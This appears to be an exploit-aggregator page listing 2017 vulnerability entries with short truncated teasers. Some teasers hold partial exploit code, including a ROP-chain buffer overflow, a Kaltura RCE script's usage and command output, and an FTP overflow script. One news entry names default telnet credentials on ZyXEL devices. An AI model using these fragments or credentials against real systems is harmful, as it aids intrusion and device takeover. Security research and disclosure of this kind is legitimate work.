vBulletin LFI

Local file include vulnerability in vBulletin routestring parameter Vulnerability Type: Local File Include For the exploit source code contact DSquare Security sales team...

Linux Kernel 4.13 (Debian 9) - Local Privilege Escalation

Linux Kernel 4.13 Debian 9 - Local Privilege Escalation / disablemapminadd.c / / / include include include include include include include / offsets might differ, kernel was custom compiled you can read vmlinux and caculate the offset when testing / / define OFFSETKERNELBASE 0x000000 / define...

Newly Published Exploit Code Used to Spread Mirai Variant

Qihoo 360 Netlab researchers reported on Friday that they are tracking an uptick in botnet activity associated with a variant of Mirai. Targeted are ports 23 and 2323 on internet-connected devices made by ZyXEL Communications that are using default admin/CenturyL1nk and admin/QwestM0dem telnet...

Microsoft Windows 10 (Build 1703 Creators Update) (x86) - WARBIRD NtQuerySystemInformation Kernel Local Privilege Escalation

Microsoft Windows 10 Build 1703 Creators Update x86 - WARBIRD NtQuerySystemInformation Kernel Local Privilege Escalation / EDB Note Source https://gist.github.com/xpn/736daa4d1ff7b9869f4b3d1e9a34d315/ff2e2465d4a07588d0148dc87e77b17b41ef9d1d Source https://blog.xpnsec.com/windows-warbird-privesc/...

PoC-Exploit-Mirror

PoC-Exploit-Mirror Archive Mirror for rec...

Monstra CMS 3.0.4 Cross Site Scripting

| | Exploit Title: Monstra cms Cross Site ScriptingXSS | Exploit Author: Ashiyane Digital security Team | Vendor Homepage : http://monstra.org/ | Software Link: https://bitbucket.org/Awilum/monstra/downloads/monstra-3.0.4.zip | Version: 3.0.4 | Date: 2017-11-13 | Category: Webapps | Tested on:...

ASLRay - Linux ELF x32 and x64 ASLR bypass exploit with stack-spraying

Linux ELF x32 and x64 ASLR bypass exploit with stack-spraying. Properties: ASLR bypass Cross-platform Minimalistic Simplicity Unpatchable Dependencies: Linux 2.6.12+ - will work on any x86-64 Debian-based OS BASH - the whole script Limitations: Stack needs to be executable -z execstack Binary has...

Kaltura 13.1.0 Remote Code Execution

!/usr/bin/env python Kaltura = 13.1.0 RCE CVE-2017-14143 https://telekomsecurity.github.io/2017/09/kaltura-rce.html $ python kalturarce.py "https://example.com" 0xxxxxxxx "system'id'" host: https://example.com entryid: 0xxxxxxxx code: system'id' + sending request.. uid=1003wwwrun gid=50004www...

Windows Search Remote Code Execution Vulnerability

A remote code execution vulnerability exists when Windows Search handles objects in memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full...

ASX to MP3 converter < 3.1.3.7 - Stack Overflow (DEP Bypass) Exploit

Exploit for windows platform in category local exploits import struct,sys head =''' REF HREF="mms://site.com/ach/music/smpl/LACA-05928-002-tes''' offset 17375 junk = "A" 17375 0x1003df8e 0x774e1035 EIP="\x36\x10\x4e\x77" adjust="A" 4 def createropchain: ropgadgets = 0x73dd5dce, POP EAX RETN...

ASX To MP3 Converter Stack Overflow

import struct,sys head =''' REF HREF="mms://site.com/ach/music/smpl/LACA-05928-002-tes''' offset 17375 junk = "A" 17375 0x1003df8e 0x774e1035 EIP="\x36\x10\x4e\x77" adjust="A" 4 def createropchain: ropgadgets = 0x73dd5dce, POP EAX RETN MFC42.DLL 0x5d091368, ptr to &VirtualProtect IAT COMCTL32.dll...

ClipBucket 2.8.3 - Remote Code Execution Exploit

Exploit for php platform in category web applications Exploit Title: ClipBucket PHP Script Remote Code Execution RCE Date: 2017-10-04 Exploit Author: Esecurity.ir Vendor Homepage: https://clipbucket.com/ Version: 2.8.3 Exploit Code By : Meisam Monsef - Email : email protected - TelgramID :...

PhpCollab 2.5.1 Shell Upload

CVE-2017-6090 PhpCollab 2.5.1 Arbitrary File Upload unauthenticated Description PhpCollab is an open source web-based project management system, that enables collaboration across the Internet. Arbitrary File Upload The phpCollab code does not correctly filter uploaded file contents. An...

Sync Breeze Enterprise 9.9.16 Buffer Overflow

!/usr/bin/python Exploit Title : Sync Breeze Enterprise 9.9.16 - 'Import Command' Buffer Overflow Discovery by : Anurag Srivastava Email : [email protected] Website : www.pyramidcyber.com Discovery Date : 21/08/2017 Software Link :...

Mail.ru: Clickjacking Full account takeover and editing the personal information at [account.my.com]

Hi, while i was testing i found that my.com is vulnerable to clickjacking so i checked if the settings page is vulnerable or not and it was vulnerable so now this has a risk!, the attacker could make an exploit code at the changing password page to takeover the victim account, and the same with t...

Oolong CVE-2017-8570 samples and behind the idea-vulnerability warning-the black bar safety net

The so-called CVE-2017-8570 sample Last week, 360 days eye lab found foreign hackers on Github released a CVE-2017-8570 exploits code, but then deleted, in order to find quite a few labeled as CVE-2017-8570 Office malware samples, such as the following VirusTotal is marked as CVE-2017-8570 sample...

Vmware virtual machine escape Vulnerability CVE-2017-4901）Exploit code analysis and use-vulnerability and early warning-the black bar safety net

0×01 event analysis 2017 7 on 19 unamer in its github released a for Vmware virtual machine escape exploit source code, using C++. The alleged impact of Vmware Workstation 12.5.5 the previous version, and gives a demonstration of the process, to achieve a from the virtual machine to the host...

Exploring the crypt: Analysis of the WannaCrypt ransomware SMB exploit propagation

Note: Read our latest comprehensive report on ransomware: Ransomware 1H 2017 review: Global outbreaks reinforce the value of security hygiene. On May 12, there was a major outbreak of WannaCrypt ransomware. WannaCrypt directly borrowed exploit code from the ETERNALBLUE exploit and the DoublePulsa...

Analysis Firefox the shared array buffer of the UAF exploit-vulnerability warning-the black bar safety net

This article explores the structured cloning algorithm to handle the shared array buffer occurs when a reference leakage problems. While the lack of overflow checking, can be exploited to execute arbitrary code. Is divided into the following sections: Background, vulnerability, summary We exploit...

Mikrotik RouterOS 6.28 FTP Buffer Overflow

import time import socket from ftplib import FTP import struct mikrotik RouterOS v6.28 FTp CWD command Buffer Overflow sultan albalawi win7 from subprocess import host='192.168.88.1' port=21 u = ""username p = ""password def myB: myB=...